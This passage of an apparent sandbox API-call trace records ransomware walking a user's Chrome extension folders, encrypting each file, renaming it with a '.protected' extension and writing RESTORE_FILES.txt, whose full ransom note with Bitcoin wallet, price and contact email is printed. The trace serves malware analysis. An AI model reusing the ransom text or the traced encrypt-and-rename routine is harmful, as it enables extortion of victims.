pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\..") returned 136 [0080.800] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.800] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.800] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="Windows") returned -1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="Program Files") returned -1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="Program Files (x86)") returned -1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="$Recycle.bin") returned 1 [0080.800] lstrcmpiW (lpString1="craw_background.js", lpString2="System Volume Information") returned -1 [0080.800] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.800] StrStrIW (lpFirst="craw_background.js", lpSrch=".protected") returned 0x0 [0080.800] lstrcmpW (lpString1="craw_background.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.801] StrStrW (lpFirst="craw_background.js", lpSrch=".txt") returned 0x0 [0080.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.801] StrStrW (lpFirst="craw_background.js", lpSrch=".rar") returned 0x0 [0080.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js") returned 152 [0080.801] StrStrW (lpFirst="craw_background.js", lpSrch=".zip") returned 0x0 [0080.801] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.810] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.811] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.811] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.811] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.812] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.812] CloseHandle (hObject=0x160) returned 1 [0080.812] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.protected") returned 162 [0080.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.protected")) returned 1 [0080.813] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="Windows") returned -1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="Program Files") returned -1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="Program Files (x86)") returned -1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="$Recycle.bin") returned 1 [0080.813] lstrcmpiW (lpString1="craw_window.js", lpString2="System Volume Information") returned -1 [0080.813] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.813] StrStrIW (lpFirst="craw_window.js", lpSrch=".protected") returned 0x0 [0080.813] lstrcmpW (lpString1="craw_window.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.814] StrStrW (lpFirst="craw_window.js", lpSrch=".txt") returned 0x0 [0080.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.814] StrStrW (lpFirst="craw_window.js", lpSrch=".rar") returned 0x0 [0080.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js") returned 148 [0080.814] StrStrW (lpFirst="craw_window.js", lpSrch=".zip") returned 0x0 [0080.814] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.824] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.824] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.824] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.824] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.825] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.825] CloseHandle (hObject=0x160) returned 1 [0080.830] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.protected") returned 158 [0080.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_window.js.protected")) returned 1 [0080.830] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.830] lstrcmpiW (lpString1="css", lpString2="Windows") returned -1 [0080.830] lstrcmpiW (lpString1="css", lpString2="Program Files") returned -1 [0080.830] lstrcmpiW (lpString1="css", lpString2="Program Files (x86)") returned -1 [0080.830] lstrcmpiW (lpString1="css", lpString2="$Recycle.bin") returned 1 [0080.830] lstrcmpiW (lpString1="css", lpString2="System Volume Information") returned -1 [0080.830] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css") returned 137 [0080.830] lstrcmpW (lpString1="css", lpString2=".") returned 1 [0080.830] lstrcmpW (lpString1="css", lpString2="..") returned 1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\*") returned 139 [0080.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.831] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.831] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.831] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.831] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.831] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\.") returned 139 [0080.831] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.831] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.831] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.831] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.831] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.831] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.831] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\..") returned 140 [0080.831] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.831] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.831] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="Windows") returned -1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="Program Files") returned -1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="Program Files (x86)") returned -1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="$Recycle.bin") returned 1 [0080.831] lstrcmpiW (lpString1="craw_window.css", lpString2="System Volume Information") returned -1 [0080.831] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.831] StrStrIW (lpFirst="craw_window.css", lpSrch=".protected") returned 0x0 [0080.831] lstrcmpW (lpString1="craw_window.css", lpString2="RESTORE_FILES.txt") returned -1 [0080.831] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.831] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.832] StrStrW (lpFirst="craw_window.css", lpSrch=".txt") returned 0x0 [0080.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.832] StrStrW (lpFirst="craw_window.css", lpSrch=".rar") returned 0x0 [0080.832] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css") returned 153 [0080.832] StrStrW (lpFirst="craw_window.css", lpSrch=".zip") returned 0x0 [0080.832] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x6cd, lpOverlapped=0x0) returned 1 [0080.844] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff933, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.844] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x6cd, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x6cd, lpOverlapped=0x0) returned 1 [0080.844] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.844] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.844] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.844] CloseHandle (hObject=0x164) returned 1 [0080.844] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.protected") returned 163 [0080.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\craw_window.css.protected")) returned 1 [0080.845] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.845] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.845] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\RESTORE_FILES.txt") returned 155 [0080.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.846] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.846] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.846] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.846] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.847] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.847] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.847] CloseHandle (hObject=0x160) returned 1 [0080.847] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.847] lstrcmpiW (lpString1="html", lpString2="Windows") returned -1 [0080.847] lstrcmpiW (lpString1="html", lpString2="Program Files") returned -1 [0080.847] lstrcmpiW (lpString1="html", lpString2="Program Files (x86)") returned -1 [0080.847] lstrcmpiW (lpString1="html", lpString2="$Recycle.bin") returned 1 [0080.847] lstrcmpiW (lpString1="html", lpString2="System Volume Information") returned -1 [0080.847] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html") returned 138 [0080.847] lstrcmpW (lpString1="html", lpString2=".") returned 1 [0080.847] lstrcmpW (lpString1="html", lpString2="..") returned 1 [0080.847] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\*") returned 140 [0080.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.847] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.847] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.847] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.847] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.847] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.847] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\.") returned 140 [0080.847] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.847] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) 